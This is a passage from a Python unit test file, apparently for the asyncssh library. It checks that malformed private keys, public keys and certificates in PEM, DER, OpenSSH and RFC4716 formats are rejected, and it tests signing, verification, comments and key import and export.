der_encode((1, b'', TaggedDERObject(0, b'')))),\n ('Invalid PKCS#1 EC named curve OID',\n der_encode((1, b'',\n TaggedDERObject(0, ObjectIdentifier('1.1'))))),\n ('Invalid PKCS#8',\n der_encode((0, (self.privkey.pkcs8_oid, ()), der_encode(None)))),\n ('Unknown PKCS#8 algorithm',\n 
der_encode((0, (ObjectIdentifier('1.1'), None), b''))),\n ('Invalid PKCS#8 ASN.1',\n der_encode((0, (self.privkey.pkcs8_oid, None), b''))),\n ('Invalid PKCS#8 params',\n der_encode((1, (self.privkey.pkcs8_oid, b''),\n der_encode((1, b''))))),\n ('Invalid PEM header', b'-----BEGIN XXX-----\\n'),\n ('Missing PEM footer', b'-----BEGIN PRIVATE KEY-----\\n'),\n ('Invalid PEM key type',\n b'-----BEGIN XXX PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END XXX PRIVATE KEY-----'),\n ('Invalid PEM Base64',\n b'-----BEGIN PRIVATE KEY-----\\n'\n b'X\\n'\n b'-----END PRIVATE KEY-----'),\n ('Missing PKCS#1 passphrase',\n b'-----BEGIN DSA PRIVATE KEY-----\\n'\n b'Proc-Type: 4,ENCRYPTED\\n'\n b'-----END DSA PRIVATE KEY-----'),\n ('Incomplete PEM ASN.1',\n b'-----BEGIN PRIVATE KEY-----\\n'\n b'-----END PRIVATE KEY-----'),\n ('Missing PEM PKCS#8 passphrase',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#1 key',\n b'-----BEGIN DSA PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END DSA PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 key',\n b'-----BEGIN PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END PRIVATE KEY-----'),\n ('Unknown format OpenSSH key',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b'XXX') +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Incomplete OpenSSH key',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b'openssh-key-v1\\0') +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH nkeys',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String(''), String(''), String(''),\n UInt32(2), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Missing OpenSSH passphrase',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('xxx'), String(''), String(''),\n UInt32(1), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Mismatched OpenSSH check bytes',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('none'), String(''), String(''),\n UInt32(1), String(''), String(b''.join((UInt32(1),\n UInt32(2))))))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH algorithm',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('none'), String(''), String(''),\n UInt32(1), String(''), String(b''.join((UInt32(1), UInt32(1),\n String('xxx'))))))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH pad',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('none'), String(''), String(''),\n UInt32(1), String(''), String(b''.join((UInt32(1), UInt32(1),\n String('ssh-dss'),\n 5*MPInt(0),\n String(''),\n b'\\0')))))) +\n b'-----END OPENSSH PRIVATE KEY-----')\n ]\n\n decrypt_errors = [\n ('Invalid PKCS#1', der_encode(None)),\n ('Invalid PKCS#8', der_encode((0, (self.privkey.pkcs8_oid, ()),\n der_encode(None)))),\n ('Invalid PEM params', b'-----BEGIN DSA PRIVATE KEY-----\\n'\n b'Proc-Type: 4,ENCRYPTED\\n'\n b'DEK-Info: XXX\\n'\n b'-----END DSA PRIVATE KEY-----'),\n ('Invalid PEM cipher', b'-----BEGIN DSA PRIVATE KEY-----\\n'\n b'Proc-Type: 4,ENCRYPTED\\n'\n b'DEK-Info: XXX,00\\n'\n b'-----END DSA PRIVATE KEY-----'),\n ('Invalid PEM IV', 
b'-----BEGIN DSA PRIVATE KEY-----\\n'\n b'Proc-Type: 4,ENCRYPTED\\n'\n b'DEK-Info: AES-256-CBC,XXX\\n'\n b'-----END DSA PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 encrypted data',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 encrypted header',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode((None, None))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 encryption algorithm',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((None, None), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES1 encryption parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_ES1_SHA1_DES, None), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES1 PKCS#12 encryption parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_P12_RC4_40, None), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES1 PKCS#12 salt',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_P12_RC4_40, (b'', 0)), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES1 PKCS#12 iteration count',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_P12_RC4_40, (b'x', 0)), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 encryption parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(((_ES2, None), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 KDF algorithm',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((None, None), (None, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 encryption algorithm',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, None), (None, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 PBKDF2 parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, None), (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 PBKDF2 salt',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (None, None)),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 PBKDF2 iteration count',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', None)),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 PBKDF2 PRF',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', 1, None)),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Unknown PEM PKCS#8 PBES2 PBKDF2 PRF',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', 1,\n (ObjectIdentifier('1.1'), None))),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid PEM PKCS#8 PBES2 encryption parameters',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n 
binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', 1)),\n (_ES2_AES128, None))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid length PEM PKCS#8 PBES2 IV',\n b'-----BEGIN ENCRYPTED PRIVATE KEY-----\\n' +\n binascii.b2a_base64(der_encode(\n ((_ES2, ((_ES2_PBKDF2, (b'', 1)),\n (_ES2_AES128, b''))), b''))) +\n b'-----END ENCRYPTED PRIVATE KEY-----'),\n ('Invalid OpenSSH cipher',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('xxx'), String(''), String(''),\n UInt32(1), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH kdf',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('xxx'),\n String(''), UInt32(1), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH kdf data',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('bcrypt'),\n String(''), UInt32(1), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH salt',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('bcrypt'),\n String(b''.join((String(b''), UInt32(128)))), UInt32(1),\n String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH encrypted data',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('bcrypt'),\n String(b''.join((String(16*b'\\0'), UInt32(128)))), UInt32(1),\n String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Unexpected OpenSSH trailing data',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String('aes256-cbc'), String('bcrypt'),\n String(b''.join((String(16*b'\\0'), UInt32(128)))), UInt32(1),\n String(''), String(''), String('xxx')))) +\n b'-----END OPENSSH PRIVATE KEY-----')\n ]\n\n public_errors = [\n ('Non-ASCII', '\\xff'),\n ('Invalid ASN.1', b'\\x30'),\n ('Invalid PKCS#1', der_encode(None)),\n ('Invalid PKCS#8', der_encode(((self.pubkey.pkcs8_oid, ()),\n BitString(der_encode(None))))),\n ('Unknown PKCS#8 algorithm', der_encode(((ObjectIdentifier('1.1'),\n None), BitString(b'')))),\n ('Invalid PKCS#8 ASN.1', der_encode(((self.pubkey.pkcs8_oid,\n None), BitString(b'')))),\n ('Invalid PEM header', b'-----BEGIN XXX-----\\n'),\n ('Missing PEM footer', b'-----BEGIN PUBLIC KEY-----\\n'),\n ('Invalid PEM key type',\n b'-----BEGIN XXX PUBLIC KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END XXX PUBLIC KEY-----'),\n ('Invalid PEM Base64',\n b'-----BEGIN PUBLIC KEY-----\\n'\n b'X\\n'\n b'-----END PUBLIC KEY-----'),\n ('Incomplete PEM ASN.1',\n b'-----BEGIN PUBLIC KEY-----\\n'\n b'-----END PUBLIC KEY-----'),\n ('Invalid PKCS#1 ASN.1',\n b'-----BEGIN DSA PUBLIC KEY-----\\n' +\n binascii.b2a_base64(b'\\x30') +\n b'-----END PUBLIC KEY-----'),\n ('Invalid PKCS#1 key data',\n b'-----BEGIN DSA PUBLIC KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END DSA PUBLIC KEY-----'),\n ('Invalid PKCS#8 key data',\n b'-----BEGIN PUBLIC KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END PUBLIC KEY-----'),\n ('Invalid OpenSSH', b'xxx'),\n ('Invalid OpenSSH Base64', b'ssh-dss X'),\n ('Unknown OpenSSH algorithm',\n b'ssh-dss ' + 
binascii.b2a_base64(String('xxx'))),\n ('Invalid OpenSSH body',\n b'ssh-dss ' + binascii.b2a_base64(String('ssh-dss'))),\n ('Unknown format OpenSSH key',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b'XXX') +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Incomplete OpenSSH key',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b'openssh-key-v1\\0') +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH nkeys',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String(''), String(''), String(''),\n UInt32(2), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid RFC4716 header', b'---- XXX ----\\n'),\n ('Missing RFC4716 footer', b'---- BEGIN SSH2 PUBLIC KEY ----\\n'),\n ('Invalid RFC4716 header',\n b'---- BEGIN SSH2 PUBLIC KEY ----\\n'\n b'Comment: comment\\n'\n b'XXX:\\\\\\n'\n b'---- END SSH2 PUBLIC KEY ----\\n'),\n ('Invalid RFC4716 Base64',\n b'---- BEGIN SSH2 PUBLIC KEY ----\\n'\n b'X\\n'\n b'---- END SSH2 PUBLIC KEY ----\\n')\n ]\n\n keypair_errors = [\n ('Mismatched certificate',\n (self.privca, self.usercert)),\n ('Invalid signature algorithm string',\n (self.privkey, None, 'xxx')),\n ('Invalid signature algorithm bytes',\n (self.privkey, None, b'xxx'))\n ]\n\n for fmt, data in private_errors:\n with self.subTest('Decode private (%s)' % fmt):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_private_key(data)\n\n for fmt, data in decrypt_errors:\n with self.subTest('Decrypt private (%s)' % fmt):\n with self.assertRaises((asyncssh.KeyEncryptionError,\n asyncssh.KeyImportError)):\n asyncssh.import_private_key(data, 'x')\n\n for fmt, data in public_errors:\n with self.subTest('Decode public (%s)' % fmt):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_public_key(data)\n\n for fmt, key in keypair_errors:\n with self.subTest('Load keypair (%s)' % fmt):\n with self.assertRaises(ValueError):\n asyncssh.load_keypairs([key])\n\n def check_sshkey_base_errors(self):\n \"\"\"Check SSHKey base class errors\"\"\"\n\n key = SSHKey(None)\n\n with self.subTest('SSHKey base class errors'):\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_pkcs1_private()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_pkcs1_public()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_pkcs8_private()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_pkcs8_public()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_ssh_private()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_ssh_public()\n\n def check_sign_and_verify(self):\n \"\"\"Check key signing and verification\"\"\"\n\n with self.subTest('Sign/verify test'):\n data = os.urandom(8)\n\n for cert in (None, self.usercert, self.userx509):\n keypair = asyncssh.load_keypairs([(self.privkey, cert)])[0]\n\n for sig_alg in keypair.sig_algorithms:\n with self.subTest('Good signature', sig_alg=sig_alg):\n try:\n keypair.set_sig_algorithm(sig_alg)\n sig = keypair.sign(data)\n\n with self.subTest('Good signature'):\n self.assertTrue(self.pubkey.verify(data, sig))\n\n badsig = bytearray(sig)\n badsig[-1] ^= 0xff\n badsig = bytes(badsig)\n\n with self.subTest('Bad signature'):\n self.assertFalse(self.pubkey.verify(data,\n badsig))\n except UnsupportedAlgorithm: # pragma: no cover\n pass\n\n with self.subTest('Missing signature'):\n self.assertFalse(self.pubkey.verify(\n data, String(self.pubkey.sig_algorithms[0])))\n\n 
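# an SSH signature blob is String(alg) followed by String(sig),\n # so these truncated variants must fail verification cleanly\n # rather than raise\n 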
with self.subTest('Empty signature'):\n self.assertFalse(self.pubkey.verify(\n data, String(self.pubkey.sig_algorithms[0]) + String(b'')))\n\n with self.subTest('Sign with bad algorithm'):\n with self.assertRaises(ValueError):\n self.privkey.sign(data, b'xxx')\n\n with self.subTest('Verify with bad algorithm'):\n self.assertFalse(self.pubkey.verify(\n data, String('xxx') + String('')))\n\n with self.subTest('Sign with public key'):\n with self.assertRaises(ValueError):\n self.pubkey.sign(data, self.pubkey.sig_algorithms[0])\n\n def check_set_certificate(self):\n \"\"\"Check setting certificate on existing keypair\"\"\"\n\n keypair = asyncssh.load_keypairs([self.privkey])[0]\n keypair.set_certificate(self.usercert)\n self.assertEqual(keypair.public_data, self.usercert.public_data)\n\n keypair = asyncssh.load_keypairs(self.privkey)[0]\n keypair = asyncssh.load_keypairs((keypair, self.usercert))[0]\n self.assertEqual(keypair.public_data, self.usercert.public_data)\n\n key2 = get_test_key('ssh-rsa', 1)\n\n with self.assertRaises(ValueError):\n asyncssh.load_keypairs((key2, self.usercert))\n\n def check_comment(self):\n \"\"\"Check getting and setting comments\"\"\"\n\n with self.subTest('Comment test'):\n self.assertEqual(self.privkey.get_comment_bytes(), b'comment')\n self.assertEqual(self.privkey.get_comment(), 'comment')\n self.assertEqual(self.pubkey.get_comment_bytes(), b'pub_comment')\n self.assertEqual(self.pubkey.get_comment(), 'pub_comment')\n\n key = asyncssh.import_private_key(\n self.privkey.export_private_key('openssh'))\n self.assertEqual(key.get_comment_bytes(), b'comment')\n self.assertEqual(key.get_comment(), 'comment')\n\n key.set_comment('new_comment')\n self.assertEqual(key.get_comment_bytes(), b'new_comment')\n self.assertEqual(key.get_comment(), 'new_comment')\n\n key.set_comment(b'new_comment')\n self.assertEqual(key.get_comment_bytes(), b'new_comment')\n self.assertEqual(key.get_comment(), 'new_comment')\n\n key.set_comment(b'\\xff')\n self.assertEqual(key.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n key.get_comment()\n\n cert = asyncssh.import_certificate(\n self.usercert.export_certificate())\n\n cert.set_comment(b'\\xff')\n self.assertEqual(cert.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n cert.get_comment()\n\n if self.x509_supported:\n cert = asyncssh.import_certificate(\n self.userx509.export_certificate())\n\n cert.set_comment(b'\\xff')\n self.assertEqual(cert.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n cert.get_comment()\n\n for fmt in ('openssh', 'rfc4716'):\n key = asyncssh.import_public_key(\n self.pubkey.export_public_key(fmt))\n self.assertEqual(key.get_comment_bytes(), b'pub_comment')\n self.assertEqual(key.get_comment(), 'pub_comment')\n\n key = asyncssh.import_public_key(\n self.pubca.export_public_key(fmt))\n self.assertEqual(key.get_comment_bytes(), None)\n self.assertEqual(key.get_comment(), None)\n\n key.set_comment('new_comment')\n self.assertEqual(key.get_comment_bytes(), b'new_comment')\n self.assertEqual(key.get_comment(), 'new_comment')\n\n key.set_comment(b'new_comment')\n self.assertEqual(key.get_comment_bytes(), b'new_comment')\n self.assertEqual(key.get_comment(), 'new_comment')\n\n for fmt in ('openssh', 'rfc4716'):\n cert = asyncssh.import_certificate(\n self.usercert.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), b'user_comment')\n self.assertEqual(cert.get_comment(), 'user_comment')\n\n cert = 
self.privca.generate_user_certificate(\n self.pubkey, 'name', principals='name1,name2',\n comment='cert_comment')\n self.assertEqual(cert.principals, ['name1', 'name2'])\n self.assertEqual(cert.get_comment_bytes(), b'cert_comment')\n self.assertEqual(cert.get_comment(), 'cert_comment')\n\n cert = asyncssh.import_certificate(\n self.hostcert.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), b'host_comment')\n self.assertEqual(cert.get_comment(), 'host_comment')\n\n cert = self.privca.generate_host_certificate(\n self.pubkey, 'name', principals=['name1', 'name2'],\n comment=b'\\xff')\n self.assertEqual(cert.principals, ['name1', 'name2'])\n self.assertEqual(cert.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n cert.get_comment()\n\n cert.set_comment('new_comment')\n self.assertEqual(cert.get_comment_bytes(), b'new_comment')\n self.assertEqual(cert.get_comment(), 'new_comment')\n\n cert.set_comment(b'new_comment')\n self.assertEqual(cert.get_comment_bytes(), b'new_comment')\n self.assertEqual(cert.get_comment(), 'new_comment')\n\n if self.x509_supported:\n for fmt in ('openssh', 'der', 'pem'):\n cert = asyncssh.import_certificate(\n self.rootx509.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), None)\n self.assertEqual(cert.get_comment(), None)\n\n cert = self.privca.generate_x509_ca_certificate(\n self.pubkey, 'OU=root', comment='ca_comment')\n self.assertEqual(cert.get_comment_bytes(), b'ca_comment')\n self.assertEqual(cert.get_comment(), 'ca_comment')\n\n cert = asyncssh.import_certificate(\n self.userx509.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), b'user_comment')\n self.assertEqual(cert.get_comment(), 'user_comment')\n\n cert = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root',\n comment='user_comment')\n self.assertEqual(cert.get_comment_bytes(), b'user_comment')\n self.assertEqual(cert.get_comment(), 'user_comment')\n\n cert = asyncssh.import_certificate(\n self.hostx509.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), b'host_comment')\n self.assertEqual(cert.get_comment(), 'host_comment')\n\n cert = self.privca.generate_x509_host_certificate(\n self.pubkey, 'OU=host', 'OU=root',\n comment='host_comment')\n self.assertEqual(cert.get_comment_bytes(), b'host_comment')\n self.assertEqual(cert.get_comment(), 'host_comment')\n\n cert.set_comment('new_comment')\n self.assertEqual(cert.get_comment_bytes(), b'new_comment')\n self.assertEqual(cert.get_comment(), 'new_comment')\n\n cert.set_comment(b'new_comment')\n self.assertEqual(cert.get_comment_bytes(), b'new_comment')\n self.assertEqual(cert.get_comment(), 'new_comment')\n\n keypair = asyncssh.load_keypairs([self.privkey])[0]\n self.assertEqual(keypair.get_comment_bytes(), b'comment')\n self.assertEqual(keypair.get_comment(), 'comment')\n\n keypair.set_comment('new_comment')\n self.assertEqual(keypair.get_comment_bytes(), b'new_comment')\n self.assertEqual(keypair.get_comment(), 'new_comment')\n\n keypair.set_comment(b'new_comment')\n self.assertEqual(keypair.get_comment_bytes(), b'new_comment')\n self.assertEqual(keypair.get_comment(), 'new_comment')\n\n keypair.set_comment(b'\\xff')\n self.assertEqual(keypair.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n keypair.get_comment()\n\n priv = asyncssh.read_private_key('priv')\n priv.set_comment(None)\n\n keypair = asyncssh.load_keypairs((priv, self.pubkey))[0]\n self.assertEqual(keypair.get_comment(), 
'pub_comment')\n\n keypair = asyncssh.load_keypairs((priv, self.usercert))[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n keypair = asyncssh.load_keypairs(priv, None, self.usercert)[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n pubdata = self.pubkey.export_public_key()\n keypair = asyncssh.load_keypairs((priv, pubdata))[0]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n certdata = self.usercert.export_certificate()\n keypair = asyncssh.load_keypairs((priv, certdata))[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n keypair = asyncssh.load_keypairs(priv, None, certdata)[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n priv.write_private_key('key')\n\n keypair = asyncssh.load_keypairs('key')[0]\n self.assertEqual(keypair.get_comment(), 'key')\n\n keypair = asyncssh.load_keypairs(('key', 'sshpub'))[0]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n keypair = asyncssh.load_keypairs(('key', 'usercert'))[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n keypair = asyncssh.load_keypairs('key', None, 'usercert')[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n self.pubkey.write_public_key('key.pub')\n\n keypair = asyncssh.load_keypairs('key')[0]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n self.usercert.write_certificate('key-cert.pub')\n\n keypair = asyncssh.load_keypairs('key')[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n keypair = asyncssh.load_keypairs('key')[1]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n keypair = asyncssh.load_keypairs(('key', None))[0]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n key2 = get_test_key('ssh-rsa', 1)\n\n with self.assertRaises(ValueError):\n asyncssh.load_keypairs((key2, 'pub'))\n\n for f in ('key', 'key.pub', 'key-cert.pub'):\n os.remove(f)\n\n def check_pkcs1_private(self):\n \"\"\"Check PKCS#1 private key format\"\"\"\n\n with self.subTest('Import PKCS#1 PEM private'):\n self.import_pkcs1_private('pem')\n\n with self.subTest('Export PKCS#1 PEM private'):\n self.export_pkcs1_private('pem')\n\n with self.subTest('Import PKCS#1 DER private'):\n self.import_pkcs1_private('der')\n\n with self.subTest('Export PKCS#1 DER private'):\n self.export_pkcs1_private('der')\n\n for cipher, args, legacy in pkcs1_ciphers:\n legacy_args = _openssl_legacy if legacy else ''\n\n with self.subTest('Import PKCS#1 PEM private (%s)' % cipher):\n self.import_pkcs1_private('pem', cipher, legacy_args + args)\n\n with self.subTest('Export PKCS#1 PEM private (%s)' % cipher):\n self.export_pkcs1_private('pem', cipher, legacy_args)\n\n def check_pkcs1_public(self):\n \"\"\"Check PKCS#1 public key format\"\"\"\n\n with self.subTest('Import PKCS#1 PEM public'):\n self.import_pkcs1_public('pem')\n\n with self.subTest('Export PKCS#1 PEM public'):\n self.export_pkcs1_public('pem')\n\n with self.subTest('Import PKCS#1 DER public'):\n self.import_pkcs1_public('der')\n\n with self.subTest('Export PKCS#1 DER public'):\n self.export_pkcs1_public('der')\n\n def check_pkcs8_private(self):\n \"\"\"Check PKCS#8 private key format\"\"\"\n\n with self.subTest('Import PKCS#8 PEM private'):\n self.import_pkcs8_private('pem')\n\n with self.subTest('Export PKCS#8 PEM private'):\n self.export_pkcs8_private('pem')\n\n with self.subTest('Import PKCS#8 DER private'):\n self.import_pkcs8_private('der')\n\n with self.subTest('Export PKCS#8 DER private'):\n self.export_pkcs8_private('der')\n\n for cipher, hash_alg, 
pbe_version, args, \\\n openssl_ok, legacy in pkcs8_ciphers:\n legacy_args = _openssl_legacy if legacy else ''\n\n with self.subTest('Import PKCS#8 PEM private (%s-%s-v%s)' %\n (cipher, hash_alg, pbe_version)):\n self.import_pkcs8_private('pem', openssl_ok, cipher,\n hash_alg, pbe_version,\n legacy_args + args)\n\n with self.subTest('Export PKCS#8 PEM private (%s-%s-v%s)' %\n (cipher, hash_alg, pbe_version)):\n self.export_pkcs8_private('pem', openssl_ok, cipher,\n hash_alg, pbe_version, legacy_args)\n\n with self.subTest('Import PKCS#8 DER private (%s-%s-v%s)' %\n (cipher, hash_alg, pbe_version)):\n self.import_pkcs8_private('der', openssl_ok, cipher,\n hash_alg, pbe_version,\n legacy_args + args)\n\n with self.subTest('Export PKCS#8 DER private (%s-%s-v%s)' %\n (cipher, hash_alg, pbe_version)):\n self.export_pkcs8_private('der', openssl_ok, cipher,\n hash_alg, pbe_version, legacy_args)\n\n if self.single_cipher:\n break\n\n def check_pkcs8_public(self):\n \"\"\"Check PKCS#8 public key format\"\"\"\n\n with self.subTest('Import PKCS#8 PEM public'):\n self.import_pkcs8_public('pem')\n\n with self.subTest('Export PKCS#8 PEM public'):\n self.export_pkcs8_public('pem')\n\n with self.subTest('Import PKCS#8 DER public'):\n self.import_pkcs8_public('der')\n\n with self.subTest('Export PKCS#8 DER public'):\n self.export_pkcs8_public('der')\n\n def check_openssh_private(self):\n \"\"\"Check OpenSSH private key format\"\"\"\n\n with self.subTest('Import OpenSSH private'):\n self.import_openssh_private()\n\n with self.subTest('Export OpenSSH private'):\n self.export_openssh_private()\n\n if bcrypt_available: # pragma: no branch\n for cipher, openssh_ok in openssh_ciphers:\n with self.subTest('Import OpenSSH private (%s)' % cipher):\n self.import_openssh_private(openssh_ok, cipher)\n\n with self.subTest('Export OpenSSH private (%s)' % cipher):\n self.export_openssh_private(openssh_ok, cipher)\n\n if self.single_cipher:\n break\n\n def check_openssh_public(self):\n \"\"\"Check OpenSSH public key format\"\"\"\n\n with 